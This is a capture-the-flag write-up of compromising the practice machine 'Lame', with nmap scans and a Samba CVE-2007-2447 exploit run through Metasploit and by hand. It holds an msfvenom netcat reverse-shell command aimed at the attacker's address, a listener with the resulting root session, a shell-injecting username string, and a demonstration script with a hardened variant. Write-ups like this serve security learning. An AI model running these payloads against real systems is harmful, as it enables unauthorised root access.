Hack the Box Lame

Arcy Caparros
Mar 13, 2020 (5 min read)


My write-up on HTB’s retired machine “Lame”

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Reconnaissance

Launching nmapAutomator, which automates the initial recon/enumeration. The basic scan it ran and its output:

nmap -Pn -sCV -p21,22,139,445 -oN nmap/Basic_10.10.10.3.nmap 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Vulnerability Information

The vulnerability scan (nmapAutomator's full port scan had also turned up 3632/tcp, which is included here):

nmap -Pn -sV --script vuln -p21,22,139,445,3632 -oN nmap/Vulns_10.10.10.3.nmap 10.10.10.3
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.3
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:4.7p1:
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
|_ CVE-2008-5161 2.6 https://vulners.com/cve/CVE-2008-5161
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
| https://distcc.github.io/security.html
|_ https://nvd.nist.gov/vuln/detail/CVE-2004-2687
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Ports and services that needed to be enumerated further:

  • 21/tcp open ftp vsftpd 2.3.4
  • 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
  • 139/tcp open netbios-ssn Samba smbd 3.X - 4.X
  • 445/tcp open netbios-ssn Samba smbd 3.X - 4.X
  • 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Enumeration

Checking the results of nmapAutomator, we can start with SMB and see what information we have.

SMBMAP result

smbmap revealed that we have READ and WRITE access to the tmp share (/tmp on the target) without credentials.

nmap's banner only narrows the server down to "3.X - 4.X"; the exact version string, Samba 3.0.20-Debian, comes from the SMB session setup (visible in nmap's smb-os-discovery script or an smbclient connection). Diving deeper into our SMB findings, let's search for available exploits related to "samba 3.0.20 Debian".

Exploitation

Exploiting Samba 3.0.20-Debian

Using Metasploit

Name: Samba “username map script” Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2007-05-14

Description:
This module exploits a command execution vulnerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
“username map script” configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands. No authentication is needed to exploit this vulnerability
since this option is used to map usernames prior to authentication!

References:
https://cvedetails.com/cve/CVE-2007-2447/
OSVDB (34700)
http://www.securityfocus.com/bid/23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html

Exploiting Samba 3.0.20-Debian

Manual exploit

Found a python script, samba-usermap-exploit.py (reference 2 below), that leverages the same Samba vulnerability without Metasploit.

Before editing the python script, we need to create our payload. A simple netcat reverse-shell payload, emitted in python syntax so it can be pasted straight into the script, can be created as such (LHOST is our attacking machine, 10.10.14.5):

msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.5 LPORT=4444 -f python

Edit samba-usermap-exploit.py and paste in the newly generated payload.

Save the python script, set up the listener in a second terminal, and run the exploit from the first:

nc -nlvp 4444 (2nd terminal screen)

python samba-usermap-exploit.py 10.10.10.3 (1st terminal screen)

The listener catches the shell:

nc -nlvp 4444
listening on [any] 4444 …
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.3] 36890
whoami
root
hostname
lame
ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:e2:fa
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:e2fa/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:e2fa/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:195592 errors:49 dropped:70 overruns:0 frame:0
TX packets:3665 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:13940860 (13.2 MB) TX bytes:430809 (420.7 KB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:22187 errors:0 dropped:0 overruns:0 frame:0
TX packets:22187 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11030705 (10.5 MB) TX bytes:11030705 (10.5 MB)

distccd v1 exploit (screenshot)

The exploit worked and we have a root shell straight away. No privilege escalation step is needed: smbd runs as root, and the username map script is executed with smbd's privileges before the client is authenticated.
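To make the mechanism behind both the Metasploit module and the manual script concrete, the following is an added example (not code from the original write-up, from Samba, or from Metasploit). It simulates the CVE-2007-2447 bug class in Python: the client-supplied username is substituted into the "username map script" command line and handed to /bin/sh, so backticks in the name execute a command, and the hardened variant shows the same call made without a shell. The MAP_SCRIPT, PAYLOAD and function names are assumptions; the malicious-username shape follows the form the usermap_script module sends, with the benign PAYLOAD standing in for the msfvenom reverse-shell one-liner.

```python
import subprocess

# Hypothetical "username map script": plain echo stands in for an admin's real
# mapping script. Samba would run it as root, before authenticating the client.
MAP_SCRIPT = "echo"

# Constructed stand-in for the msfvenom cmd/unix/reverse_netcat payload; a real
# run would put the netcat reverse-shell one-liner here instead.
PAYLOAD = "echo INJECTED"


def build_malicious_username(payload: str) -> str:
    """Wrap the command in backticks so the target's /bin/sh runs it while
    expanding the map-script command line. The Metasploit module uses the same
    "/=`...`" shape (it additionally prefixes the command with nohup so the
    shell survives smbd tearing down the session)."""
    return "/=`" + payload + "`"


def map_user_vulnerable(username: str) -> str:
    """Vulnerable pattern (Samba 3.0.20 - 3.0.25rc3): the untrusted name is
    interpolated into a command string that /bin/sh then parses, so shell
    metacharacters in it are interpreted."""
    cmdline = '%s "%s"' % (MAP_SCRIPT, username)
    result = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def map_user_hardened(username: str) -> str:
    """Hardened pattern: the name travels as a single argv element straight to
    the program. No shell ever sees it, so backticks stay literal text."""
    result = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return result.stdout.strip()


def is_safe_username(username: str) -> bool:
    """Defence in depth: reject anything outside a conservative charset before
    it reaches any external program at all."""
    if not username or len(username) > 64:
        return False
    return all(c.isalnum() or c in "._-@" for c in username)


if __name__ == "__main__":
    evil = build_malicious_username(PAYLOAD)
    print("username sent by the client :", evil)
    print("vulnerable map script output:", map_user_vulnerable(evil))
    print("hardened map script output  :", map_user_hardened(evil))
    print("passes username allow-list  :", is_safe_username(evil))
```

With the vulnerable function the output is "/=INJECTED": the shell ran the command embedded in the name and spliced its output into the argument. The hardened function prints the name back verbatim, backticks and all, and the allow-list rejects it outright; on the real target the payload is a reverse shell, so the difference between those two code paths is the difference between a root shell and a failed login.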

Lessons Learned

  • Understand the exploits you find; do not run them blindly assuming "it should work".
  • Get familiar with creating payloads using msfvenom.
  • As always, keep your systems up to date on patches.

References:

  1. https://www.offensive-security.com/metasploit-unleashed/msfvenom/
  2. https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851#file-samba-usermap-exploit-py
